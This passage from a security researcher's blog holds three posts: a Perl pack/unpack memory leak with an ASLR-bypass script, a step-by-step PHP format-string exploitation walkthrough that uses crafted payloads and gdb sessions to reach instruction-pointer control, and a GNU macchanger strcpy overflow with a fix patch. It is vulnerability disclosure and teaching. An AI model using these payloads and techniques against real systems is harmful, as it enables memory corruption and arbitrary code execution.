        } else {
            printf(".");
        }
    }
 
    printf(" |\n");
 
    # sleep just a moment so we dont spam stdout
    Time::HiRes::usleep($print_throttle);
 
}

Try it yourself! You should see something like this…

andrew@WOPR ~ % /tmp/leak.pl 
0x0000000001895dc0 | 77 68 61 74 65 76 65 72 00 01 87 01 00 00 00 00 | whatever........ |
0x0000000001895dd0 | b8 91 87 01 00 00 00 00 21 00 00 00 00 00 00 00 | ........!....... |
0x0000000001895de0 | 90 5d 89 01 00 00 00 00 28 c1 87 01 00 00 00 00 | .]......(....... |
0x0000000001895df0 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895e00 | 00 00 00 00 00 00 00 00 18 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895e10 | 02 00 00 00 00 00 00 00 97 c6 ad 70 08 00 00 00 | ...........p.... |
0x0000000001895e20 | 50 65 72 6c 49 4f 3a 3a 00 00 00 00 00 00 00 00 | PerlIO::........ |
0x0000000001895e30 | 00 00 00 00 00 00 00 00 61 00 00 00 00 00 00 00 | ........a....... |
0x0000000001895e40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
0x0000000001895e50 | 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 | ................ |
0x0000000001895e60 | 70 c1 87 01 00 00 00 00 00 00 00 00 00 00 00 00 | p............... |
0x0000000001895e70 | 00 00 00 00 00 00 00 00 58 c1 87 01 00 00 00 00 | ........X....... |
0x0000000001895e80 | 00 00 00 00 00 00 00 00 b8 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895e90 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895ea0 | 00 00 00 00 00 00 00 00 b8 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895eb0 | 5d 00 00 00 00 00 00 00 2d d7 2b 1b 0c 00 00 00 | ].......-.+..... |
0x0000000001895ec0 | 2f 74 6d 70 2f 6c 65 61 6b 2e 70 6c 00 00 00 00 | /tmp/leak.pl.... |
0x0000000001895ed0 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895ee0 | 00 00 00 00 00 00 00 00 60 6a 03 bb 4a 7f 00 00 | ........`j..J... |
... etc ...

But we can do better! Even though memory leaks like this don’t give direct code execution, they are extremely useful when combined with another more serious bug, because they provide an easy ASLR bypass. If we can read pointers from memory, we can calculate exactly where code is located. Astute readers may have noticed that the last 8 bytes of the last line above are a pointer to a shared library: 0x00007f4abb036a60 (little-endian reversed of course). All we need to do is predict the relative location of a useful pointer (such as one in libc), and snag it. That turns out to be fairly easy. Observe…

#!/usr/bin/perl
 
# this code is tuned for 64bit and will crash on 32bit
# but there's no reason it wouldn't work there too
# would just take a little modification / heap grooming
 
# by whatever random chance, this broken IO puts a libc
# pointer in just the right place on the heap. *shrug*
open(DERP, "</etc/passwd");
while(<DERP>){};
 
$libc = 0x0;
 
$str = "whatever";              # put something on the heap
$ptr = unpack(Q,pack(p,$str));  # get a real pointer to it
$ptr = $ptr + 8;                # the libc ptr is just past it
for($c=0;$c<8;$c++) {
    # read 8 bytes and lay them over $libc
    $byte = substr(unpack(p,pack(Q,$ptr+$c)),0,1);
    $libc += ord($byte) << ($c * 8);
}
 
# the libc base is either at $libc-0x394100 or $libc-0x38c100
# we can't be sure which, but either way the memory is readable
# so we just look for \x7fELF and choose the one that has it :)
# 0x156 == '\x7f' + 'E' + 'L' + 'F'
$header_sum = 0;
for($c=0;$c<4;$c++) {
    $byte = substr(unpack(p,pack(Q,$libc-0x38c100+$c)),0,1);
    $header_sum += ord($byte);
}
if($header_sum == 0x156) {
    $libc -= 0x38c100;
} else {
    $libc -= 0x394100;
}
 
printf("LEAKED: libc @ 0x%012x\n", $libc);
printf("Checking with /proc/self/maps to make sure...\n");
open(FILE, "</proc/self/maps");
while(<FILE>) { if(/libc-/) { print "$_"; } }

I’ve only tested this code on a few systems (Arch and Debian), but it worked nicely on both. Your millage may vary. If all goes well, you should see…

andrew@WOPR ~ % /tmp/aslr_bypass.pl     
LEAKED: libc @ 0x7ffac762c000
Checking with /proc/self/maps to make sure...
7ffac762c000-7ffac77c3000 r-xp 00000000 fe:01 4862344                    /usr/lib/libc-2.23.so
7ffac77c3000-7ffac79c3000 ---p 00197000 fe:01 4862344                    /usr/lib/libc-2.23.so
7ffac79c3000-7ffac79c7000 r--p 00197000 fe:01 4862344                    /usr/lib/libc-2.23.so
7ffac79c7000-7ffac79c9000 rw-p 0019b000 fe:01 4862344                    /usr/lib/libc-2.23.so

All of that being the case, is this a serious security concern? Probably not, no. To be fair, I can’t think of a situation in which it would pose a real threat, but I still find it shocking and bizarre. When I mentioned it to the development team they stated stated:
“It’s as ugly as hell, but there may be people still using it, which is why we’re reluctant to get rid of it.  The question is whether it represents any sort of security issue. I can’t currently see that it does.”
Since any sort of “exploit” for this issue requires the ability to run arbitrary Perl anyway, I tend to agree.  An attacker who can run code already could just as easily read /proc/self/mem, or do any number of much more malicious things. Even a malicious script uploaded to a webserver wouldn’t need an exploit, since Perl does not offer the same “safe mode” functionality that similar languages like PHP do. Any attacker who can run unpack() can already do far worse.

Regardless, it seems wrong to me that interpreted code should be allowed to access memory directly.  Is that not one of the core advantages of an interpreted language; to keep the code from doing dangerous things with memory? Maybe this doesn’t pose a threat, but at the very least I’ll agree with the “ugly as hell” sentiment.

That said, if anyone can think of a situation in which this IS highly dangerous I’d love to hear about it. Feel free to comment below or send me a message directly. Until then we can just categorize this as “LOL”, and move on. :)

[1]. http://perldoc.perl.org/functions/pack.html

Thursday, July 28, 2016

Exploiting PHP Format String Bugs the Easy Way

I’ve been spending a lot of time poking through the PHP source-code lately, and twice now I’ve come across format string vulnerabilities. [1][2]  I don’t consider format string bugs particularly interesting in-and-of themselves (they’re well known, and well understood), but it turns out PHP format strings are special.  PHP adds functionality that makes these bugs a breeze to exploit.  Let me explain…

First though, full disclosure: this technique is not entirely my own.  The original idea was inspired by Stefan Esser (@i0n1c) back in November of 2015. [3]  If you enjoy security research, especially relating to PHP, I would highly recommend you follow him!

Ok, PHP handles most format strings using custom internal functions.  There are lots of these defined all throughout the code.  For instance let’s grep for function definitions containing a format string as an argument.  This isn’t perfect or scientific, but it gives you an idea.

andrew@thinkpad /tmp % grep -PRHn "const char ?\* ?(format|fmt)" ./php-7.0.3 | wc -l
149

I won’t post all of those, but here are two examples.  In fact, these are the same functions that were erroneously called in the two bugs linked below.

static void zend_throw_or_error(int fetch_type, zend_class_entry *exception_ce, const char *format, ...)
ZEND_API ZEND_COLD zend_object *zend_throw_exception_ex(zend_class_entry *exception_ce, zend_long code, const char *format, ...)
... etc ...

Most, if not all, of these internal format string functions ultimately call either “xbuf_format_converter” (defined in main/spprintf.c), or “format_converter” (defined in main/snprintf.c).  These two functions actually do the work of walking along the string and substituting specifiers with their corresponding values.  This would be totally uninteresting, except for the fact that PHP adds one block that you don’t see in other format string implementations.  From “main/spprintf.c”…

case 'Z': {
    zvp = (zval*) va_arg(ap, zval*);
    free_zcopy = zend_make_printable_zval(zvp, &zcopy);
    if (free_zcopy) {
        zvp = &zcopy;
    }
    s_len = Z_STRLEN_P(zvp);
    s = Z_STRVAL_P(zvp);
    if (adjust_precision && precision < s_len) {
        s_len = precision;
    }
    break;
}

This special “%Z” option is designed to convert what’s known as a “zval” to a string. A zval (defined in Zend/zend_types.h) is simply a structure containing information about a variable, such as its type and value. Here is its definition, watered down for clarity…

typedef union _zend_value {
    zend_string      *str;
    zend_array       *arr;
    zend_object      *obj;
    ... lots of possible types ...
} zend_value;
 
struct _zval_struct {
    zend_value        value;
    union {
        struct {
            ZEND_ENDIAN_LOHI_4(
                zend_uchar    type,
                zend_uchar    type_flags,
                zend_uchar    const_flags,
                zend_uchar    reserved)
        } v;
        uint32_t type_info;
    } u1;
    ... uninteresting bits removed ...
 
};

As you can see, a zval contains type information, as well as an element (value) which can be interpreted in any number of different ways depending on the declared type. Now… as long as the code above is operating on a real zval, (which is assumed to be the case since the “%Z” is only used internally), everything will work fine. However, if we are able to specify a “%Z” on data we control, as is the case with format string bugs, we can force PHP to do unexpected things. So… lets assume we can control the data; what’s actually going on here? If you notice above, when “%Z” is specified, PHP calls “zend_make_printable_zval” on our fake zval, which eventually calls “_zval_get_string_func” (defined in Zend/zend_operators.c).  This function contains a switch/case operating on the “type” field of the zval struct.  Most of the cases are boring, converting integers to strings and such, but one stands out: IS_OBJECT.

case IS_OBJECT: {
   zval tmp;
   if (Z_OBJ_HT_P(op)->cast_object) {
      if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_STRING) == SUCCESS) {
... etc ...

Function pointers!  That looks juicy!  Let’s investigate those macros.  From Zend/zend_types.h:

#define Z_OBJ(zval)        (zval).value.obj
#define Z_OBJ_P(zval_p)    Z_OBJ(*(zval_p))
 
#define Z_OBJ_HT(zval)     Z_OBJ(zval)->handlers
#define Z_OBJ_HT_P(zval_p) Z_OBJ_HT(*(zval_p))

Oh goodie! :) If we use the “%Z” operator on memory we control, we will control those function pointers too!  All we need to do is arrange a fake zval in memory such that they become something useful.  Since we know what the struct(s) should look like, this shouldn’t be too hard.

In order to test this, we’ll use the SNMP error format string bug (php bug #71704) [2]. The trigger looks like this:

$session = new SNMP(SNMP::VERSION_3, "127.0.0.1:161", "public");
$session->exceptions_enabled = SNMP::ERRNO_ANY;
try {
    $session->get($argv[1]); // FORMAT STRING IN ARGV[1]
} catch (SNMPException $e) {
    echo $e->getMessage();
}

Let’s start by poking around memory to find a pointer to our data.  We’ll use a series of “%d”s to walk down the stack, followed by “w00t%swoot”.  If we ever see our data show up between the “woot” flags, we win!

andrew@thinkpad /tmp % for i in {0..15}; do \
> echo -e "\n=========$i=========="; \
> ./php-7.0.3/sapi/cli/php ./snmp.php \
>     `perl -e 'print "%d"x'$i' . "woot%swoot";'`; \
> done
 
=========0==========
Invalid object identifier: woot0�%�
                                   �'�
                                      �'�U�woot
=========1==========
woot
=========2==========
Invalid object identifier: -1077237472-1216724645woot �%��Iwoot
=========3==========
Segmentation fault (core dumped)
 
=========4==========
Invalid object identifier: -1079040880-1216933541-12561159361wootwoot
=========5==========
Segmentation fault (core dumped)
 
=========6==========
Invalid object identifier: -1074727184-1216655013-12561159361-12561159361woot(null)woot
=========7==========
Invalid object identifier: -1076316912-1217130149-12561159361-125611593610woowoot
=========8==========
Invalid object identifier: -1080902384-1217461925-12582130881-125821308810-1257840348woot�� ��$�woot
=========9==========
Invalid object identifier: -1075700320-1217191589-12561159361-125611593610-1255743196136380004woot$�&�woot
=========10==========
Invalid object identifier: -1079922576-1217162917-12561159361-125611593610-1255743196136380004-1256115968woot(null)woot
=========11==========
Segmentation fault (core dumped)
 
=========12==========
Invalid object identifier: -1075153200-1217171109-12561159361-125611593610-1255743196136380004-1256115968032wootInvalid object identifier: %swoot
=========13==========
Invalid object identifier: -1081187680-1217064613-12561159361-125611593610-1255743196136380004-1256115968032142166864woot%d%d%d%d%d%d%d%d%d%d%d%d%dwoot%swootwoot
=========14==========
Invalid object identifier: -1078765664-1216839333-12561159361-125611593610-1255743196136380004-1256115968032142166864-1255809008wootwoot
=========15==========
Invalid object identifier: -1075294480-1216716453-12561159361-125611593610-1255743196136380004-1256115968032142166864-1255809008-1255702516woot�woottnvalid object identifier: -1079248000woot�åN

Aha!!! If you didn’t already see it, check out number 13.  After popping 13 values of the stack, the 14th value was a pointer to our string. Switching the “%s” with a “%08x” reveals the pointer to be 0xb5a5e010.  It doesn’t seem to change much, so for now let’s ignore the obvious ASLR problem and focus on getting EIP.

First let’s open it up in gdb and see what’s happening.  We know that PHP will be expecting a zval at the pointer, so let’s add some junk data to the start of our string.  This will be our fake zval.  Based on the struct definition above, we know the 9th byte represents the type.  In this case we’d like to represent the OBJECT type, which is 0x08.  Let’s also add some extra padding so that we have room to play as we go. All said, our fake zval will look like:

[ fake zval ............ ][ junk ......][ format string  ]
[ 8bytes padding ][ 0x08 ][some padding][ %d x 13 ][ %Z  ]

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "AAAABBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "AAAABBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x08301482 in _zval_get_string_func (op=op@entry=0xb5a5e010)
    at /home/ubuntu/php-7.0.3/Zend/zend_operators.c:838
838             if (Z_OBJ_HT_P(op)->cast_object) {
(gdb) x/1i $eip
=> 0x8301482 <_zval_get_string_func>:  mov    0x10(%ebx),%edx
(gdb) i r $ebx
ebx            0x41414141   1094795585
(gdb)

Nice! We landed just where we wanted to, and now PHP is trying to dereference our AAAA. We’d like to give it a valid address, so how about the address of BBBB directly after? Math time: if AAAA is at 0xb5a5e010, that means BBBB is at 0xb5a5e014. However, the instruction isn’t dereferencing the pointer exactly, but rather, 16 bytes past it (0x10). So we need to subtract 0x10 from our pointer to account, giving us 0xb5a5e004. Let’s try it. Don’t forget to reverse it, since x86 is little endian.

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "\x04\xe0\xa5\xb5BBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "\x04\xe0\xa5\xb5BBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x08301485 in _zval_get_string_func (op=op@entry=0xb5a5e010)
    at /home/ubuntu/php-7.0.3/Zend/zend_operators.c:838
838             if (Z_OBJ_HT_P(op)->cast_object) {
(gdb) x/1i $eip
=> 0x8301485 <_zval_get_string_func>:  mov    0x54(%edx),%eax
(gdb) i r $ebx $edx
ebx            0xb5a5e004   -1247420412
edx            0x42424242   1111638594
(gdb)

Sweet! It used our pointer and is trying to dereference BBBB. Rinse and repeat. This time let’s target CCCC. Since they’re 9 bytes into the string, the pointer will be 0xb5a5e019, however again we need to account for the offset. This time it’s 0x54. Simple subtraction gives us 0xb5a5efc5. Let’s try it.

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "\x04\xe0\xa5\xb5\xc5\xdf\xa5\xb5\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "\x04\xe0\xa5\xb5\xc5\xdf\xa5\xb5\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r $ebx $edx $eip
ebx            0xb5a5e004   -1247420412
edx            0xbfffb060   -1073762208
eip            0x43434343   0x43434343
(gdb)

We win! With control of EIP it’s essentially game over. The only big problem still standing in our way is ASLR. Considering the wide variation of PHP binaries that exist in the wild as well as the prevalence of ASLR, this would normally be quite tricky. But we have another trick up our sleeve. We can cheat!

As long as we’re careful, an invalid format string won’t necessarily crash the application, even if it misbehaves. With a little finesse we can use the same format string bug to leak an address. Once we know the address of a string, we can patch it dynamically and then run it through again; this time for real. The challenge then becomes modifying the string without modifying its location. I’ll leave that as an exercise for the reader. :)

If you’d like to see a working exploit for this issue, mine is public on exploit-db. [4] It bypasses ASLR and NX beautifully. All the pointers and ROP gadgets are from a custom binary, so you’ll still need to put your own work in, but it’s a start. Enjoy!

[1]. https://bugs.php.net/bug.php?id=71105
[2]. https://bugs.php.net/bug.php?id=71704
[3]. https://twitter.com/i0n1c/status/664706994478161920
[4]. https://www.exploit-db.com/exploits/39645/

Sunday, April 17, 2016

GNU macchanger <= 1.6.0 Heap Buffer Overflow

I was poking around the GNU macchanger source code the other day for fun and happened across this little gem. Unfortunately modern heap-corruption protections make exploitation extremely difficult, if not impossible (to the best of my knowledge), and even then, you would only be able to gain the privileges of the current user. But what the heck, let’s dive in anyway! A little throwback to the glory days of stack smashing.

In case you aren’t aware, GNU macchanger is a simple program written in C which alters the MAC address of a given network interface. How it does this is beyond the scope of this blog-post, but it can be useful if you need to, for instance, troll sysadmins by bypassing their impenetrable MAC-address-whitelist. Let me also shout out to macchanger’s author, Alvaro Lopez, for the fantastic work. Over-all, macchanger is a very useful bit of code, and I can’t thank you enough. I will be submitting a patch to resolve this issue as soon as I’m done typing here. Anyone wishing to download a copy of the code can do so at: https://ftp.gnu.org/gnu/macchanger/

The issue exists in the file netinfo.c:38-58, in the function mc_net_info_new(). Relevant code…

net_info_t *
mc_net_info_new (const char *device)
{
        net_info_t *new = (net_info_t *) malloc (sizeof(net_info_t));
 
        new->sock = socket (AF_INET, SOCK_DGRAM, 0);

        if (new->sock<0) {
                perror ("[ERROR] Socket");
                free(new);
                return NULL;
        }

        strcpy (new->dev.ifr_name, device);

        if (ioctl(new->sock, SIOCGIFHWADDR, &new->dev) < 0) {
                perror ("[ERROR] Set device name");
                free(new);
                return NULL;
        }
 
        return new;
}

I could spend the next 10 paragraphs explaining to you why strcpy()’ing arbitrary data into a fixed length character array is a bad idea, but AlephOne beat me to it back in Phrack 49 (1996). So instead let’s just take a closer look at what’s getting clobbered.

This function accepts one const char * argument called device. This value will be taken from argv[argc-1] (the last command line argument), and represents the network interface macchanger should be working with.

This function declares one local variable of type net_info_t * called new. net_info_t is a struct, defined in netinfo.h:33-36. Relevant code…

typedef struct {
        int sock;
        struct ifreq dev;
} net_info_t;

IF_NAMESIZE is previously define as 16 on line 32 of the same file. This ultimately means that new->dev.ifr_name (which strcpy() is going to use as the copy destination) will only be 16 bytes, whereas device, (our command line argument), can be arbitrarily long. And that leads to large quantities of fun. :) Relevant…

andrew@WOPR ~ % macchanger BBBBBBBBBBBBBBBB
*** buffer overflow detected ***: macchanger terminated
======= Backtrace: =========
/usr/lib/libc.so.6(+0x73f8e)[0x7f9e47940f8e]
/usr/lib/libc.so.6(__fortify_fail+0x37)[0x7f9e479c6e57]
/usr/lib/libc.so.6(+0xf7f60)[0x7f9e479c4f60]
macchanger[0x40198f]
macchanger[0x400ecc]
/usr/lib/libc.so.6(__libc_start_main+0xf0)[0x7f9e478ed000]
macchanger[0x4010e5]
======= Memory map: ========
00400000-00403000 r-xp 00000000 fe:01 2292415                            /usr/bin/macchanger
00602000-00603000 r--p 00002000 fe:01 2292415                            /usr/bin/macchanger
00603000-00604000 rw-p 00003000 fe:01 2292415                            /usr/bin/macchanger
022e8000-0238d000 rw-p 00000000 00:00 0                                  [heap]
7f9e476b7000-7f9e476cd000 r-xp 00000000 fe:01 2246088                    /usr/lib/libgcc_s.so.1
7f9e476cd000-7f9e478cc000 ---p 00016000 fe:01 2246088                    /usr/lib/libgcc_s.so.1
7f9e478cc000-7f9e478cd000 rw-p 00015000 fe:01 2246088                    /usr/lib/libgcc_s.so.1
7f9e478cd000-7f9e47a71000 r-xp 00000000 fe:01 2231574                    /usr/lib/libc-2.19.so
7f9e47a71000-7f9e47c71000 ---p 001a4000 fe:01 2231574                    /usr/lib/libc-2.19.so
7f9e47c71000-7f9e47c75000 r--p 001a4000 fe:01 2231574                    /usr/lib/libc-2.19.so
7f9e47c75000-7f9e47c77000 rw-p 001a8000 fe:01 2231574                    /usr/lib/libc-2.19.so
7f9e47c77000-7f9e47c7b000 rw-p 00000000 00:00 0
7f9e47c7b000-7f9e47c9c000 r-xp 00000000 fe:01 2231549                    /usr/lib/ld-2.19.so
7f9e47e1c000-7f9e47e64000 rw-p 00000000 00:00 0
7f9e47e9a000-7f9e47e9b000 rw-p 00000000 00:00 0
7f9e47e9b000-7f9e47e9c000 r--p 00020000 fe:01 2231549                    /usr/lib/ld-2.19.so
7f9e47e9c000-7f9e47e9d000 rw-p 00021000 fe:01 2231549                    /usr/lib/ld-2.19.so
7f9e47e9d000-7f9e47e9e000 rw-p 00000000 00:00 0
7fffa1aca000-7fffa1aeb000 rw-p 00000000 00:00 0                          [stack]
7fffa1bfc000-7fffa1bfe000 r-xp 00000000 00:00 0                          [vdso]
7fffa1bfe000-7fffa1c00000 r--p 00000000 00:00 0                          [vvar]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
[1]    5575 abort (core dumped)  macchanger BBBBBBBBBBBBBBBB

Here's the patch...

--- /tmp/macchanger-1.6.0/src/netinfo.c 2013-03-16 17:56:37.000000000 -0500
+++ /tmp/macchanger-1.6.0-patched/src/netinfo.c 2014-08-23 16:25:31.929638204 -0500
@@ -47,6 +47,12 @@
        return NULL;
    }
 
+   if (strlen(device) >= IFNAMSIZ) {
+       fprintf (stderr, "[ERROR] Device name too long\n");
+       free(new);
+       return NULL;
+   }
+
    strcpy (new->dev.ifr_name, device);
    if (ioctl(new->sock, SIOCGIFHWADDR, &new->dev) < 0) {
        perror ("[ERROR] Set device name");

Remember kids… Just say no to strcpy()